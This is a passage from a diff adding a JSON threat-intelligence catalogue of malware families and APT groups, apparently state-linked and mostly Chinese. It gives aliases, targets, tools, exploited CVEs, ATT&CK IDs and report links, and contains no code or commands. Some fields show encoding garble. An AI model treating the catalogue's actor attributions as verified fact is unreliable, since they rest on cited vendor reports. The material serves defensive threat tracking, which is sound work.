"Fucobha", + "IceFog" + ], + "comments": null, + "family": [], + "links": [ + "https://web.archive.org/web/20160825001253/http://www.kaspersky.com/about/news/virus/2013/Kaspersky_Lab_exposes_Icefog_a_new_cyber-espionage_campaign_focusing_on_supply_chain_attacks", + "https://securelist.com/blog/research/57331/the-icefog-apt-a-tale-of-cloak-and-three-daggers/" + ] + }, + { + "names": [ + "CTran", + "HTran", + "Xdoor", + "ONHAT (similar)" + ], + "comments": "Chinese Tunneling Tool", + "family": [], + "links": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/htran/" + ] + }, + { + "names": [ + "Agent.BTZ", + "SillyFDC" + ], + "comments": null, + "family": [], + "links": [ + "http://cybercampaigns.net/wp-content/uploads/2013/05/Agent-BTZ.pdf" + ] + }, + { + "names": [ + "Comfoo" + ], + "comments": "RSA incident, Red October", + "family": [], + "links": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/" + ] + }, + { + "names": [ + "DNSChanger", + "RSPlug" + ], + "comments": null, + "family": [ + "ZLob" + ], + "links": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/" + ] + }, + { + "names": [ + "Comfoo", + "IEXPLORE RAT", + "Briba", + "Sharky RAT" + ], + "comments": null, + "family": [], + "links": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99&tabid=2", + "https://www.secureworks.com/research/secrets-of-the-comfoo-masters", + "https://citizenlab.org/2012/09/citizen-lab-technical-brief-iexpl0re-rat/" + ] + }, + { + "names": [ + "LSB" + ], + "comments": null, + "family": [], + "links": [ + "https://github.com/RobinDavid/LSB-Steganography", + "http://ijact.org/volume3issue4/IJ0340004.pdf" + ] + }, + { + "names": [ + "LStudio", + "Elise", + "Emissary" + ], + "comments": null, + "family": [], + "links": [ + "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + ] + }, + { + "names": [ + "MNKit", + "Tran Duy Linh", + "WingD" + ], + "comments": null, + "family": [], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + ] + }, + { + "names": [ + "Mivast", + "Photo", + "Derusbi", + "Shyape", + "Sakula (variant)" + ], + "comments": "Chinese Backdoor, Winnti", + "family": [ + "Derusbi" + ], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", + "https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf" + ] + }, + { + "names": [ + "Epic", + "Tavdig", + "Wipbot" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Carbon Rootkit", + "Cobra", + "Snake Rootkit" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Turla", + "Uroburos" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "HIGHNOON", + "Derusbi", + "Winnti (Network Driver Component)", + "Rbdoor" + ], + "comments": "P2P Backdoor, Driver loaded into memory", + "family": [], + "links": [ + "https://securelist.com/?s=winnti", + "http://blog.vsec.com.vn/apt/initial-winnti-analysis-against-vietnam-game-company.html#more-73" + ] + }, + { + "names": [ + "WCE", + "AceHash" + ], + "comments": "Password Dumper, PTH", + "family": [], + "links": [ + "http://www.ampliasecurity.com/research/windows-credentials-editor/" + ] + }, + { + "names": [ + "Mimikatz", + "Powerkatz" + ], + "comments": "Password Dumper, PTH, DCSync, SkeletonKey, Golden/Silver Tickets", + "family": [], + "links": [ + "https://github.com/gentilkiwi/mimikatz" + ] + }, + { + "names": [ + "HDRoot", + "HDD Rootkit" + ], + "comments": "Winnti / Axiom Group", + "family": [], + "links": [ + "http://williamshowalter.com/a-universal-windows-bootkit/" + ] + }, + { + "names": [ + "OrcaRAT", + "LeoUnica" + ], + "comments": "Found with Comfoo malware", + "family": [], + "links": [ + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html", + "https://github.com/kbandla/APTnotes/blob/master/2014/LeoUncia_OrcaRat.pdf" + ] + }, + { + "names": [ + "Etumbot" + ], + "comments": "Assocaited with Numbered Panda/APT12", + "family": [], + "links": [ + "https://cysinfo.com/sx-2nd-meetup-reversing-and-decrypting-the-communications-of-apt-malware/", + "https://www.arbornetworks.com/blog/asert/illuminating-the-etumbot-apt-backdoor/" + ] + }, + { + "names": [ + "xcmd" + ], + "comments": "Similar to psexec. Used in OPM and Anthem breaches", + "family": [], + "links": [] + }, + { + "names": [ + "NjRAT" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "CHOPSTICK", + "Backdoor.SofacyX", + "SPLM", + "Fysbis", + "X-Agent" + ], + "comments": "Used by Sofacy group, Linux backdoor", + "family": [], + "links": [ + "http://www.welivesecurity.com/2016/10/25/lifting-lid-sednit-closer-look-software-uses/" + ] + }, + { + "names": [ + "AlienSpy", + "Frutas", + "Unrecom", + "jFrutas", + "jRAT", + "Adwind RAT", + "jSocket" + ], + "comments": null, + "family": [ + "Adwind" + ], + "links": [ + "https://t.co/x0jmdEp45w" + ] + }, + { + "names": [ + "Jiripbot", + "Flacher" + ], + "comments": "Wild Neutron", + "family": [], + "links": [] + }, + { + "names": [ + "Quasar RAT" + ], + "comments": null, + "family": [], + "links": [ + "https://github.com/quasar/QuasarRAT/tree/v1.2.0.0" + ] + }, + { + "names": [ + "Mtool", + "MultiTool" + ], + "comments": "Cn Group Tool for Recon", + "family": [], + "links": [] + }, + { + "names": [ + "Manuscrypt ", + "FallChill" + ], + "comments": "Backdoor. Used by Lazarus Group, Bluenoroff.", + "family": [], + "links": [ + "https://securelist.com/apt-trends-report-q2-2017/79332/" + ] + }, + { + "names": [ + "Infy M", + "Infy" + ], + "comments": null, + "family": [], + "links": [ + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" + ] + }, + { + "names": [ + "DustySky", + "NeD Worm" + ], + "comments": null, + "family": [], + "links": [ + "http://www.clearskysec.com/dustysky/" + ] + }, + { + "names": [ + "Exforel" + ], + "comments": "SIG30 in NSA report, Chinese origin", + "family": [], + "links": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:WinNT/Exforel.A", + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/" + ] + }, + { + "names": [ + "LoJax" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "ROKRAT" + ], + "comments": null, + "family": [], + "links": [ + "http://v3lo.tistory.com/24", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + { + "names": [ + "Hermes", + "Ryuk" + ], + "comments": "Ryuk based on Hermes GRIM SPIDER (cybercrime)", + "family": [], + "links": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-exploring-the-human-connection/", + "https://blog.kryptoslogic.com/malware/2019/01/10/dprk-emotet.html" + ] + }, + { + "names": [ + "XAP", + "X-Tunnel", + "Xtunnel", + "Shunnael" + ], + "comments": "Used by APT28 / Sofacy, A family of modular backdoors with Windows, Linux, and iOS variants. The malware,which includes espionage functionalities like keystroke logging and file exfiltration, is typically dropped after a reconnaissance phase as second-stage malware.", + "family": [], + "links": [] + }, + { + "names": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "comments": "Used by GOSSIPGIRL (umbrella group)", + "family": [], + "links": [ + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0" + ] + }, + { + "names": [ + "Zekapab", + "Zebrocy" + ], + "comments": "A multilanguage family of modular downloaders, droppers, and backdoors deriving from Delphocy", + "family": [], + "links": [] + }, + { + "names": [ + "Sednit", + "JKEYSKW", + "SofacyCarberp", + "JHUHUGIT", + "SeduUploader" + ], + "comments": "A first-stage downloader based on the Carberp banking Trojan. It serves as reconnaissance malware and can download a secondary backdoor such as XAgent", + "family": [], + "links": [] + }, + { + "names": [ + "Sofacy", + "SOURFACE" + ], + "comments": "A first-stage downloader that retrieves a second stage backdoor from a command-and-control server", + "family": [], + "links": [] + }, + { + "names": [ + "BE", + "BlackEnergy" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "BE2", + "BlackEnergy2 " + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "GreyEnergy Mini", + "FELIXROOT" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "CrashOverride", + "Industroyer" + ], + "comments": "A modular malware designed to disrupt ICS processes in electrical substations. Industroyer consists of an initial backdoor, loader module, and several supporting and payload modules. The malware also includes a data wiper and a denial of service (DoS) tool targeted at Siemens SIPROTEC protection relays.", + "family": [], + "links": [] + }, + { + "names": [ + "GoldenEye", + "NotPetya", + "ExPetr", + "Diskcoder.C", + "Nyetya" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://github.com/kbandla/APTnotes" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://aptnotes.malwareconfig.com/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://apt.securelist.com/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://cybercampaigns.net/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://www.slideshare.net/Cyphort/cyber-espionage-nation-stateaptattacksontherise" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://www.crowdstrike.com/blog/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://securelist.com/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://www.cfr.org/interactive/cyber-operations" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://www.symantec.com/content/dam/symantec/docs/reports/istr-healthcare-2017-en.pdf" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://attack.mitre.org/wiki/Groups" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://dragos.com/adversaries.html" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXB85f6VL_Zm79wtTK59xADKh6MG0G7hSBZi8cPOiQVWAIie0/pub" + ] + } + ], + "actors": [ + { + "country": "china", + "names": [ + "TG-8223", + "GIF89a, ShadyRAT, Shanghai Group, Byzantine Candor", + "PLA Unit 61398", + "APT1", + "Comment Panda", + "BrownFox", + "Comment Crew" + ], + "targets": [ + "U.S. cybersecurity firm Mandiant, later purchased by FireEye, released a report in February 2013 that exposed one of China's cyber espionage units, Unit 61398. The group, which FireEye called APT1, is a unit within China's People's Liberation Army (PLA) that has been linked to a wide range of cyber operations targeting U.S. private sector entities for espionage purposes. The comprehensive report detailed evidence connecting APT1 and the PLA, offered insight into APT1's operational malware and methodologies, and provided timelines of the espionage it conducted." + ], + "operations": [ + "GhostNet" + ], + "description": null, + "tools": [ + "WEBC2", + "BISCUIT and many others" + ], + "links": [ + "http://www.nytimes.com/2013/02/19/technology/chinas-army-is-seen-as-tied-to-hacking-against-us.html?emc=na&_r=2&", + "http://www.nartv.org/mirror/ghostnet.pdf", + "https://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators", + "http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf" + ], + "attck_id": "G0006", + "comment": null + }, + { + "country": "china", + "names": [ + "Putter Panda", + "APT2", + "PLA Unit 61486", + "SearchFire", + "TG-6952" + ], + "targets": [ + "This threat actor targets firms in the technology (communications, space, aerospace), research, defense, and government sectors in the United States for espionage purposes. The tools and infrastructure it uses overlap with PLA Unit 61398." + ], + "operations": [], + "description": null, + "tools": [ + "Their activities are commonly known to be exploiting CVE-2012-0158 (MSOffice vulnerability in MSCOMCTL.OCX) in SpearPhising operations. Related malware: Moose", + "Warp", + "MSUpdater" + ], + "links": [ + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "http://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" + ], + "attck_id": "G0024", + "comment": null + }, + { + "country": "china", + "names": [ + "Boyusec \u00e2\u0080\u0093 the Guangzhou Boyu Information Technology Company, Ltd", + "Gothic Panda", + "APT3", + "UPS Team", + "Buckeye", + "UPS", + "TG-0110" + ], + "targets": [ + "This threat actor targets and compromises entities in the defense, construction, technology, and transportation sectors. Up until 2015, it was primarily focused on U.S. and UK entities, but it shifted to Hong Kong\u00c3\u00a2\u00e2\u0082\u00ac\u00e2\u0080\u009cbased targets afterward. Aerospace and Defence; Construction and Engineering; Energy; High Tech; Nonprofit; Telecommunications; Transportation" + ], + "operations": [ + "Double Tap", + "Clandestine Wolf" + ], + "description": null, + "tools": [ + "Filensfer", + "Shadow Brokers exploits", + "Bemstour", + "Kaba", + "Pirpi", + "SportLoader", + "Shotput", + "Cookie Cutter", + "DoublePulsar", + "and Flash", + "many 0days: IE", + "Firefox", + "PlugX/Sogu" + ], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html", + "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", + "http://freebeacon.com/national-security/u-s-indicts-three-chinese-hackers-linked-security-firm/amp/", + "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html", + "http://www.secureworks.com/resources/blog/research/threat-group-0110-targets-manufacturing-and-financial-organizations-via-phishing/", + "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.recordedfuture.com/chinese-mss-behind-apt3/", + "https://www.washingtonpost.com/world/national-security/china-hacked-a-navy-contractor-and-secured-a-trove-of-highly-sensitive-data-on-submarine-warfare/2018/06/08/6cc396fa-68e6-11e8-bea7-c8eb28bc52b1_story.html?noredirect=on&utm_term=.209df584e031", + "https://intrusiontruth.wordpress.com/2018/05/22/the-destruction-of-apt3/" + ], + "attck_id": "G0022", + "comment": null + }, + { + "country": "china", + "names": [ + "Calc Team", + "Numbered Panda", + "IXESHE", + "BeeBus", + "APT12", + "TG-2754 (tentative)", + "DynCalc, Crimson Iron, DNSCalc" + ], + "targets": [ + "This threat actor targets organizations in Japan, Taiwan, and elsewhere in East Asia\u00c3\u00a2\u00e2\u0082\u00ac\u00e2\u0080\u009dincluding electronics manufacturers and telecommunications companies\u00c3\u00a2\u00e2\u0082\u00ac\u00e2\u0080\u009dfor espionage purposes." + ], + "operations": [], + "description": null, + "tools": [ + "Mswab", + "3001", + "Waterspout", + "ShowNews", + "Riptide", + "Etumbot", + "ThreeByte", + "Gh0st", + "Hightide" + ], + "links": [ + "http://blog.crowdstrike.com/whois-numbered-panda/", + "http://www.secureworks.com/cyber-threat-intelligence/threats/analysis-of-dhs-nccic-indicators/", + "http://www.computerworld.com/s/article/9241577/The_Chinese_hacker_group_that_hit_the_N.Y._Times_is_back_with_updated_tools?taxonomyId=17", + "http://blog.macnica.net/blog/2017/08/post-fb81.html", + "http://www.crowdstrike.com/blog/whois-numbered-panda/", + "http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/", + "https://cysinfo.com/sx-2nd-meetup-reversing-and-decrypting-the-communications-of-apt-malware/", + "http://blog.trendmicro.com/taking-a-bite-out-of-ixeshe/" + ], + "attck_id": "G0005", + "comment": null + }, + { + "country": "china", + "names": [ + "APT16" + ], + "targets": [ + "This threat actor targets and compromises Japanese and Taiwanese entities in the finance, tech, media, and government sectors." + ], + "operations": [], + "description": "Spear phishing email delivering a malicious Microsoft Word document exploiting EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader (IRONHALO), or a backdoor (ELMER). Also known to be using compromised VPN credentials to maintain network persistency. ", + "tools": [ + "HTRAN", + "UNICAT", + "ELMER backdoor", + "Gh0st", + "Pandora", + "Poison Ivy" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": "G0023", + "comment": null + }, + { + "country": "china", + "names": [ + "https://401trg.com/burning-umbrella/", + "Aurora Panda", + "Hidden Lynx", + "Deputy Dog", + "Tailgater Team", + "APT17" + ], + "targets": [ + "Government, defense & aerospace, industrial engineering, NGOs" + ], + "operations": [], + "description": null, + "tools": [ + "ZxShell", + "Backdoor.Moudoor", + "Trojan.Hydraq", + "Sakula", + "Backdoor.Vasport", + "Backdoor.Boda", + "PlugX", + "Trojan.Naid", + "Joy RAT", + "BLACKCOFFEE", + "DestroyRAT", + "China Chopper", + "WEBCnC" + ], + "links": [ + "http://www.darkreading.com/attacks-and-breaches/chinese--hidden-lynx--hackers-launch-widespread-apt-attacks/d/d-id/1111589?page_number=2", + "http://www.crowdstrike.com/blog/french-connection-french-aerospace-focused-cve-2014-0322-attack-shares-similarities-2012/", + "https://www.infosecurity-magazine.com/news/chinese-espionage-group-widescale/", + "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/", + "http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", + "https://401trg.com/burning-umbrella/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/hidden_lynx.pdf", + "http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.bloomberg.com/features/2021-supermicro/", + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf" + ], + "attck_id": "G0025", + "comment": null + }, + { + "country": "china", + "names": [ + "Dynamite Panda", + "TA428", + "Wekby", + "APT18", + "TG-0416" + ], + "targets": [ + "Aerospace and Defence; Construction and Engineering; Education; Health and Biotechnology; High Tech; Telecommunications; Transportation" + ], + "operations": [], + "description": null, + "tools": [ + "HTTPBrowser", + "TManger", + "PisLoader", + "HcdLoader", + "TokenControl" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", + "https://blog.group-ib.com/task", + "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", + "https://www.recordedfuture.com/china-linked-ta428-threat-group/", + "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", + "https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828" + ], + "attck_id": "G0026", + "comment": null + }, + { + "country": "china", + "names": [ + "Dogfish (iDefense), Deputy Dog (iDefense), Winnti Umbrella", + "Tailgater Team", + "APT17", + "Axiom" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Hikit", + "ZxShell", + "Timestomper", + "Derusbi", + "HDRoot", + "Fscan", + "PlugX", + "HTRAN", + "Winnti", + "HydraQ", + "Deputy Dog", + "PoisonIvy", + "Gh0st RAT" + ], + "links": [ + "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/", + "http://www.novetta.com/2015/04/operation-smn-winnti-update/", + "https://401trg.com/burning-umbrella/", + "http://www.novetta.com/files/5614/1329/6232/novetta_cybersecurity_exec_summary-3.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/", + "http://securelist.com/blog/research/57585/winnti-faq-more-than-just-a-game/" + ], + "attck_id": "G0001", + "comment": "Use \"Skeleton Key\" on DCs" + }, + { + "country": "china", + "names": [ + "BRONZE ATLAS", + "APT41", + "Winnti Umbrella, BARIUM, LEAD, RedEcho, Vanadinite, TAG-22", + "Winnti Group", + "Wicked Panda" + ], + "targets": [ + "ThyssenKrupp, Gameforge, Valve, Teamviewer,Siemens, Sumitomo, BASF, Covestro, Shin-Etsu, Bayer, Roche" + ], + "operations": [], + "description": null, + "tools": [ + "Webshells", + "ZxShell", + "PlugX", + "Winnti", + "ShadowPad", + "AceHash" + ], + "links": [ + "https://lab52.io/blog/winnti-group-geostrategic-analysis-and-ttp/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", + "https://401trg.com/burning-umbrella/", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/january/windows-firewall-hook-enumeration/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://www.nccgroup.trust/globalassets/our-research/uk/technical-advisories/2015/derusbi-server-technical-note-1-1-tlp-white.pdf", + "https://web.br.de/interaktiv/winnti/index.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-vanadinite/" + ], + "attck_id": "G0044", + "comment": null + }, + { + "country": "china", + "names": [ + "Deep Panda", + "Sh3llCr3w, PinkPanther, Winnti Group", + "WebMasters", + "KungFu Kittens", + "Shell Crew", + "APT19" + ], + "targets": [], + "operations": [ + "Anthem Hack", + "OPM" + ], + "description": null, + "tools": [ + "Sakula/Sakurel", + "Derusbi", + "Scanbox Framework", + "WCE", + "many Webshells including China Chopper" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf", + "https://www.isightpartners.com/2015/07/threatscape-media-highlights-update-week-of-july-29th/" + ], + "attck_id": "G0009", + "comment": null + }, + { + "country": "china", + "names": [ + "APT30", + "Naikon", + "Lotus Panda", + "PLA Unit 78020", + "Thrip" + ], + "targets": [ + "satellite communications operator, Telecoms, and Defense Companies, Hong Kong" + ], + "operations": [ + "Camera Shy", + "Naikon" + ], + "description": null, + "tools": [ + "RARSTONE", + "NETEAGLE", + "XSControl", + "BACKSPACe" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-apt-south-east-asia", + "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", + "http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/", + "https://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf?t=1443030820943&submissionGuid=407e0945-4acd-407c-8668-c5943f220e29", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf", + "https://www.threatconnect.com/camerashy/", + "https://cluster25.io/2022/04/29/lotus-panda-awake-last-strike/" + ], + "attck_id": "G0019", + "comment": null + }, + { + "country": "china", + "names": [ + "Spring Dragon", + "Lotus Blossom", + "ST Group, Esile" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Lstudio", + "CVE-2017-11882", + "Elise Backdoor" + ], + "links": [ + "http://www.trendmicro.com.my/vinfo/my/security/news/cyber-attacks/esile-targeted-attack-campaign-hits-apac-governments", + "http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf", + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://community.rsa.com/community/products/netwitness/blog/2018/01/30/apt32-continues-asean-targeting", + "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + ], + "attck_id": "G0030", + "comment": null + }, + { + "country": "china", + "names": [ + "APT6", + "1.php Group" + ], + "targets": [ + "US Government Organizations" + ], + "operations": [], + "description": null, + "tools": [ + "", + "Poison Ivy" + ], + "links": [ + "https://www.zscaler.com/blogs/research/1php-group-intrusion-set-paper", + "https://motherboard.vice.com/read/fbi-flash-alert-hacking-group-has-had-access-to-us-govt-files-for-years", + "https://www.zscaler.com/pdf/technicalbriefs/tb_advanced_persistent_threats.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/tb_advanced_persistent_threats.pdf" + ], + "attck_id": null, + "comment": "Overlaps with Operation Night Dragon" + }, + { + "country": "china", + "names": [ + "Hippo Team", + "APT26", + "JerseyMikes", + "Turbine Panda" + ], + "targets": [ + "Affected Industry: Aerospace and Defense, business and Professional Services/Legal/Accounting, High Tech Software and hardware services" + ], + "operations": [], + "description": "Supply-chain attacks such as strategic web compromise (SWC) where the actor compromise 3rd-party service provider hosting the victim websites", + "tools": [ + "GSECDUMP", + "SOGU", + "QUICKBALL", + "credential stealers such as WCE", + "COATHOOK", + "QuickPulse", + "HTRAN", + "TWOCHAINS", + "Cobalt" + ], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf?mkt_tok=3RkMMJWWfF9wsRojuKrPZKXonjHpfsX/7e8tWrHr08Yy0EZ5VunJEUWy2ocITtQ/cOedCQkZHblFnV4AS626XrENqKML", + "https://www.crowdstrike.com/resources/wp-content/brochures/reports/huge-fan-of-your-work-intelligence-report.pdf", + "https://digit.fyi/lengthy-cyber-espionage-operation-helped-china-develop-c919-airliner/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Social Network Team", + "Ke3Chang", + "Playful Dragon", + "Vixen Panda", + "Mirage", + "GREF", + "APT15", + "Mirage Team, Lurid, Social Network Team, Royal APT, Metushy, Winnti Umbrella, NICKEL" + ], + "targets": [ + "PH, VN, TW, US, UK, IT, PL, UN, SG, NATO - Gov, Political party" + ], + "operations": [], + "description": null, + "tools": [ + "CYFREE", + "RoyalCli", + "SOGU", + "Mirage", + "SWALLOWFLY", + "ENDCMD", + "iWebRat", + "Russian-language decoy document", + "NOISEMAKER", + "TidePool", + "MIRAGE", + "(Nvidia program side-loading) PlugX", + "BS2005", + "ENFAL", + "XSLCmd", + "QUICKHEAL" + ], + "links": [ + "https://github.com/nccgroup/Royal_APT", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html", + "https://401trg.com/burning-umbrella/", + "http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi#page=51", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ], + "attck_id": "G0004", + "comment": "Some vendors track this group in up to 3 separate groups" + }, + { + "country": "china", + "names": [ + "Lanzhou PLA Unit", + "APT21", + "NetTraveler" + ], + "targets": [ + "This threat actor targets computer networks associated with Tibetan and Uyghur activists for 